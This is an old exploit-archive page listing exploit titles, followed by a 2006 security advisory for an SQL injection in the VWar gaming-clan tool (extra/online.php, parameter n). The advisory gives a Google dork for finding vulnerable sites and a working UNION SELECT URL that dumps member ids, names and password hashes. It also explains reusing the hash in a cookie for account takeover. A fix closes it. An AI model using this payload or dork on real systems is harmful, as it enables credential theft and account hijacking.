
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
110 lines
2.4 KiB
Text
Executable file
110 lines
2.4 KiB
Text
Executable file
.:[ insecurity research team ]:.
|
|
.__..____.:.______.____.:.____ .
|
|
.:. | |/ \:/ ___// __ \:/ _\.:.
|
|
: | | | \\____\\ ___/\ /__ :. .
|
|
..: |__|___| /____ >\___ >\___ >.:
|
|
.:.. .. .\/ .:\/:. .\/. .:\/:
|
|
. ...:. .advisory. .:...
|
|
:..................: 1o.o8.2oo6 ..
|
|
|
|
|
|
Affected Application: VWar <= v1.50 R14
|
|
|
|
|
|
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
Discoverd by: brOmstar
|
|
|
|
Team: Insecurity Research Team
|
|
|
|
URL: http://www.insecurityresearch.org
|
|
|
|
E-Mail: brom0815@gmx.de
|
|
|
|
|
|
|
|
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
Typ: Remote [x] Local [ ]
|
|
|
|
Remote File Inclusion [ ] SQL Injection [x]
|
|
|
|
Level: Low [ ] Middle [ ] High [x]
|
|
|
|
Application: VWar
|
|
|
|
Version: <= v1.50 R14
|
|
|
|
Vulnerable File: extra/online.php
|
|
|
|
Vulnerable Variable: n
|
|
|
|
URL: http://www.vwar.de
|
|
|
|
Description: Virtual War is a tool for gaming clans.
|
|
|
|
Dork: intext:"Powered by: Virtual War v1.5.0"
|
|
|
|
|
|
|
|
. . :[ code snippet ]: . . . . . . . . . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
line 63: $query = $vwardb->query("
|
|
|
|
line 64: SELECT memberid, name, lastactivity
|
|
|
|
line 65: FROM vwar".$n."_member WHERE lastactivity > ".(time() -
|
|
|
|
$onlinetime * 60)."
|
|
|
|
line 66: ");
|
|
|
|
|
|
|
|
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
example: if you want a list of userid/username/password's try this:
|
|
|
|
|
|
http://www.vwar.de/demo/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,CONCAT(memberid,0x3A,name,0x3A,password),2%20FROM%20vwar_member%20%20/*
|
|
|
|
|
|
encrypt the md5-password again with md5 and throw it in a cookie... :-)
|
|
|
|
|
|
|
|
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
o1.) open extra/online.php
|
|
|
|
o2.) take a look at the following lines:
|
|
|
|
41: if( !defined ("VWAR_COMMON_INCLUDED") )
|
|
|
|
42: {
|
|
|
|
43: $vwar_root = $vwar_xroot;
|
|
|
|
44: require_once ( $vwar_root . "includes/functions_common.php" );
|
|
|
|
45: }
|
|
|
|
o3.) add between line 44 and 45 this:
|
|
|
|
require_once ( $vwar_root . "includes/_config.inc.php" );
|
|
|
|
o4.) done!
|
|
|
|
|
|
|
|
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
buzzdee, camino and my lovely, sexy girlfriend!
|
|
|
|
# milw0rm.com [2006-08-10]
|